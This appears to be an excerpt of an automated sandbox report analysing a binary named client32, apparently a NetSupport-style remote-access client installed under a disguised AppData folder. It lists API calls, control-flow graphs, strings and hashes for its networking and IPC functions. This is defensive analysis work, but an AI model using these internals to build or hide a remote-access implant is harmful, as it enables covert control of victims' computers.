                                                                                                                                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D64D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D676
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D683
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D6A0
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D6E9
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D6F6
                                                                                                                                                                                                      • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
                                                                                                                                                                                                      • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D7EB
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D7F8
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1109D810
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1109D818
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1109D8C4
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D934
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D93B
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D979
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA35
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                                                                                    • API String ID: 3291243470-2792520954
                                                                                                                                                                                                    • Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                                                                                    • Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61
                                                                                                                                                                                                    Function 685A7030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 742 685a7030-685a7050 call 68592a90 call 685adbd0 747 685a7052-685a7095 LoadLibraryA 742->747 748 685a7097 742->748 749 685a7099-685a70f8 call 68598d00 InitializeCriticalSection CreateEventA 747->749 748->749 752 685a70fa-685a710e call 68596f50 749->752 753 685a7111-685a711e CreateEventA 749->753 752->753 755 685a7120-685a7134 call 68596f50 753->755 756 685a7137-685a7144 CreateEventA 753->756 755->756 759 685a715d-685a7170 WSAStartup 756->759 760 685a7146-685a715a call 68596f50 756->760 761 685a7172-685a7182 call 68595290 call 68592b70 759->761 762 685a7183-685a71b2 call 685b1b69 759->762 760->759 771 685a71d0-685a71e4 call 685b1c50 762->771 772 685a71b4-685a71cd call 68596f50 762->772 778 685a71fa-685a7202 771->778 779 685a71e6-685a71e9 771->779 772->771 780 685a7209-685a7223 call 685b3753 778->780 781 685a7204 778->781 779->778 782 685a71eb-685a71f1 779->782 786 685a723c-685a7255 call 685a9bf0 780->786 787 685a7225-685a7239 call 68596f50 780->787 781->780 782->778 783 685a71f3-685a71f8 782->783 783->780 792 685a726a-685a7271 call 68595730 786->792 793 685a7257-685a725e 786->793 787->786 797 685a730b-685a7310 792->797 798 685a7277-685a729a call 685b1b69 792->798 794 685a7260-685a7268 793->794 794->792 794->794 799 685a731e-685a7336 call 68595e90 call 68595530 797->799 800 685a7312-685a7315 797->800 806 685a72be-685a72dc call 685b1c50 call 685b1b69 798->806 807 685a729c-685a72bb call 68596f50 798->807 805 685a7339-685a7354 call 68595e90 799->805 800->799 803 685a7317-685a731c 800->803 803->799 803->805 818 685a7361-685a738b GetTickCount CreateThread 805->818 819 685a7356-685a735c 805->819 826 685a72fa-685a7308 call 685b1c50 806->826 827 685a72de-685a72f7 call 68596f50 806->827 807->806 821 685a73a9-685a73b6 SetThreadPriority 818->821 822 685a738d-685a73a6 call 68596f50 818->822 819->818 824 685a73b8-685a73cc call 68596f50 821->824 825 685a73cf-685a73ed call 68595f20 call 68595e90 821->825 822->821 824->825 839 685a73ef 825->839 840 685a73f5-685a73f7 825->840 826->797 827->826 839->840 841 685a73f9-685a7407 call 685adbd0 840->841 842 685a7425-685a7447 GetModuleFileNameA call 68592420 840->842 847 685a7409-685a741c call 68594580 841->847 848 685a741e 841->848 849 685a7449-685a744a 842->849 850 685a744c 842->850 852 685a7420 847->852 848->852 853 685a7451-685a746d 849->853 850->853 852->842 855 685a7470-685a747f 853->855 855->855 856 685a7481-685a7486 855->856 857 685a7487-685a748d 856->857 857->857 858 685a748f-685a74c8 GetPrivateProfileIntA GetModuleHandleA 857->858 859 685a74ce-685a74fa call 68595e90 * 2 858->859 860 685a7563-685a758f CreateMutexA timeBeginPeriod 858->860 865 685a74fc-685a7511 call 68595e90 859->865 866 685a7536-685a755d call 68595e90 * 2 859->866 871 685a752a-685a7530 865->871 872 685a7513-685a7528 call 68595e90 865->872 866->860 871->866 872->866 872->871
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
                                                                                                                                                                                                      • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
                                                                                                                                                                                                      • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
                                                                                                                                                                                                      • Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05
                                                                                                                                                                                                      • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                                                                                                      • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                                                                                                      • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll), ref: 685A7057
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(685DB898), ref: 685A70DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A70EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A7115
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A713B
                                                                                                                                                                                                    • WSAStartup.WSOCK32(00000101,685DB91A), ref: 685A7167
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685A71A3
                                                                                                                                                                                                      • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                                                                                                      • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                                                                                                      • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685A71D3
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 685A7214
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685A728B
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685A72C1
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685A72CD
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685A7303
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A7361
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,685A6BA0,00000000,00000000,685DBACC), ref: 685A737E
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 685A73AC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\Support\,00000104), ref: 685A7430
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini), ref: 685A74B0
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(nsmtrace), ref: 685A74C0
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 685A7566
                                                                                                                                                                                                    • timeBeginPeriod.WINMM(00000001), ref: 685A7573
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                                                                                                    • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$305090$C:\Users\user\AppData\Roaming\SystemUtil\Support\$C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                                                                                                    • API String ID: 3160247386-2308324566
                                                                                                                                                                                                    • Opcode ID: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
                                                                                                                                                                                                    • Instruction ID: bf6727e0cf09bfdcc17968a086c2d736e5d68eb3cb2f468a3d27a176817d2a7a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3D1F6B5940305AFDB10AF688CC496E7BF9EB49348BC6442AFD59D7341E770AC408B9D
                                                                                                                                                                                                    Function 11029230 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 877 11029230-110292be LoadLibraryA 878 110292c1-110292c6 877->878 879 110292c8-110292cb 878->879 880 110292cd-110292d0 878->880 881 110292e5-110292ea 879->881 882 110292d2-110292d5 880->882 883 110292d7-110292e2 880->883 884 11029319-11029325 881->884 885 110292ec-110292f1 881->885 882->881 883->881 888 110293ca-110293cd 884->888 889 1102932b-11029343 call 1115f321 884->889 886 110292f3-1102930a GetProcAddress 885->886 887 1102930c-1102930f InternetCloseHandle 885->887 886->887 892 11029311-11029313 SetLastError 886->892 887->884 890 110293e8-11029400 InternetOpenA 888->890 891 110293cf-110293e6 GetProcAddress 888->891 897 11029364-11029370 889->897 898 11029345-1102935e GetProcAddress 889->898 895 11029424-11029430 call 1115f3b5 890->895 891->890 894 11029419-11029421 SetLastError 891->894 892->884 894->895 904 11029436-11029467 call 1113e8f0 call 11160b10 895->904 905 110296aa-110296b4 895->905 903 11029372-1102937b GetLastError 897->903 906 11029391-11029393 897->906 898->897 900 11029402-1102940a SetLastError 898->900 900->903 903->906 907 1102937d-1102938f call 1115f3b5 call 1115f321 903->907 931 11029469-1102946c 904->931 932 1102946f-11029484 call 11080b10 * 2 904->932 905->878 908 110296ba 905->908 912 110293b0-110293bc 906->912 913 11029395-110293ae GetProcAddress 906->913 907->906 911 110296cc-110296cf 908->911 918 110296d1-110296d6 911->918 919 110296db-110296de 911->919 912->888 933 110293be-110293c7 912->933 913->912 916 1102940f-11029417 SetLastError 913->916 916->888 922 1102983f-11029847 918->922 924 110296e0-110296e5 919->924 925 110296ea 919->925 929 11029850-11029863 922->929 930 11029849-1102984a FreeLibrary 922->930 926 1102980f-11029814 924->926 927 110296ed-110296f5 925->927 937 11029816-1102982d GetProcAddress 926->937 938 1102982f-11029835 926->938 935 110296f7-1102970e GetProcAddress 927->935 936 11029714-11029722 927->936 930->929 931->932 950 11029486-1102948a 932->950 951 1102948d-11029499 932->951 933->888 935->936 940 110297ce-110297d0 SetLastError 935->940 945 110297d6-110297dd 936->945 947 11029728-1102972d 936->947 937->938 941 11029837-11029839 SetLastError 937->941 938->922 940->945 941->922 948 110297ec-1102980d call 11027510 * 2 945->948 947->948 952 11029733-1102976f call 1110c4a0 call 110274c0 947->952 948->926 950->951 954 110294c4-110294c9 951->954 955 1102949b-1102949d 951->955 979 11029781-11029783 952->979 980 11029771-11029774 952->980 961 110294cb-110294dc GetProcAddress 954->961 962 110294de-110294f5 InternetConnectA 954->962 958 110294b4-110294ba 955->958 959 1102949f-110294b2 GetProcAddress 955->959 958->954 959->958 964 110294bc-110294be SetLastError 959->964 961->962 966 11029521-1102952c SetLastError 961->966 967 11029697-110296a7 call 1115e091 962->967 968 110294fb-110294fe 962->968 964->954 966->967 967->905 969 11029500-11029502 968->969 970 11029539-11029541 968->970 974 11029504-11029517 GetProcAddress 969->974 975 11029519-1102951f 969->975 977 11029543-11029557 GetProcAddress 970->977 978 11029559-11029574 HttpOpenRequestA 970->978 974->975 983 11029531-11029533 SetLastError 974->983 975->970 977->978 984 11029576-1102957e SetLastError 977->984 985 11029581-11029584 978->985 981 11029785 979->981 982 1102978c-11029791 979->982 980->979 986 11029776-1102977a 980->986 981->982 987 11029793-110297a9 call 110cedc0 982->987 988 110297ac-110297ae 982->988 983->970 984->985 990 11029692-11029695 985->990 991 1102958a-1102958f 985->991 986->979 992 1102977c 986->992 987->988 995 110297b0-110297b2 988->995 996 110297b4-110297c5 call 1115e091 988->996 990->967 994 110296bc-110296c9 call 1115e091 990->994 997 11029591-110295a8 GetProcAddress 991->997 998 110295aa-110295b6 991->998 992->979 994->911 995->996 1000 110297df-110297e9 call 1115e091 995->1000 996->948 1011 110297c7-110297c9 996->1011 997->998 1003 110295b8-110295c0 SetLastError 997->1003 1005 110295c2-110295db GetLastError 998->1005 1000->948 1003->1005 1009 110295f6-1102960b 1005->1009 1010 110295dd-110295f4 GetProcAddress 1005->1010 1015 11029615-11029623 GetLastError 1009->1015 1010->1009 1013 1102960d-1102960f SetLastError 1010->1013 1011->927 1013->1015 1016 11029625-1102962a 1015->1016 1017 1102962c-11029638 GetDesktopWindow 1015->1017 1016->1017 1018 11029682-11029687 1016->1018 1019 11029653-1102966f 1017->1019 1020 1102963a-11029651 GetProcAddress 1017->1020 1018->990 1021 11029689-1102968f 1018->1021 1019->990 1024 11029671 1019->1024 1020->1019 1022 11029676-11029680 SetLastError 1020->1022 1021->990 1022->990 1024->985
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,24DE4E77,74DF23A0,?,00000000), ref: 11029265
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
                                                                                                                                                                                                    • InternetCloseHandle.WININET(000000FF), ref: 1102930D
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029313
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 11029372
                                                                                                                                                                                                    • _free.LIBCMT ref: 1102937E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
                                                                                                                                                                                                    • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029404
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029411
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102941B
                                                                                                                                                                                                    • _free.LIBCMT ref: 11029425
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110294BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
                                                                                                                                                                                                    • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029523
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,111955F8,00000000,00000000,00000000,8040F000,00000000), ref: 1102956F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110297D0
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029839
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1102984A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free$CloseConnectHandleHeapHttpLoadRequest
                                                                                                                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                                                                                    • API String ID: 1980367711-913974648
                                                                                                                                                                                                    • Opcode ID: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
                                                                                                                                                                                                    • Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61
                                                                                                                                                                                                    Function 6859A980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1413 6859a980-6859a9e7 call 68595840 1416 6859a9ed-6859a9f0 1413->1416 1417 6859aa9c 1413->1417 1416->1417 1419 6859a9f6-6859a9fb 1416->1419 1418 6859aaa2-6859aaae 1417->1418 1420 6859aab0-6859aac5 call 685b28e1 1418->1420 1421 6859aac6-6859aacd 1418->1421 1419->1417 1422 6859aa01-6859aa06 1419->1422 1425 6859ab48-6859ab58 socket 1421->1425 1426 6859aacf-6859aad7 1421->1426 1422->1417 1424 6859aa0c-6859aa21 EnterCriticalSection 1422->1424 1430 6859aa89-6859aa9a LeaveCriticalSection 1424->1430 1431 6859aa23-6859aa2b 1424->1431 1427 6859ab5a-6859ab6f WSAGetLastError call 685b28e1 1425->1427 1428 6859ab70-6859abc9 #21 * 2 call 68595e90 1425->1428 1426->1425 1432 6859aad9-6859aadc 1426->1432 1442 6859abe8-6859ac1f bind 1428->1442 1443 6859abcb-6859abe3 #21 1428->1443 1430->1418 1435 6859aa30-6859aa39 1431->1435 1432->1425 1436 6859aade-6859ab05 call 6859a5c0 1432->1436 1439 6859aa49-6859aa51 1435->1439 1440 6859aa3b-6859aa3f 1435->1440 1450 6859ab0b-6859ab2f WSAGetLastError call 685930a0 1436->1450 1451 6859ad4a-6859ad69 EnterCriticalSection 1436->1451 1439->1435 1446 6859aa53-6859aa5e LeaveCriticalSection 1439->1446 1440->1439 1444 6859aa41-6859aa47 1440->1444 1447 6859ac41-6859ac49 1442->1447 1448 6859ac21-6859ac40 WSAGetLastError closesocket call 685b28e1 1442->1448 1443->1442 1444->1439 1449 6859aa60-6859aa88 LeaveCriticalSection call 685b28e1 1444->1449 1446->1418 1452 6859ac59-6859ac64 1447->1452 1453 6859ac4b-6859ac57 1447->1453 1461 6859ae82-6859ae92 call 685b28e1 1450->1461 1465 6859ab35-6859ab47 call 685b28e1 1450->1465 1454 6859ad6f-6859ad7d 1451->1454 1455 6859ae50-6859ae80 LeaveCriticalSection GetTickCount InterlockedExchange 1451->1455 1460 6859ac65-6859ac83 htons WSASetBlockingHook call 68597610 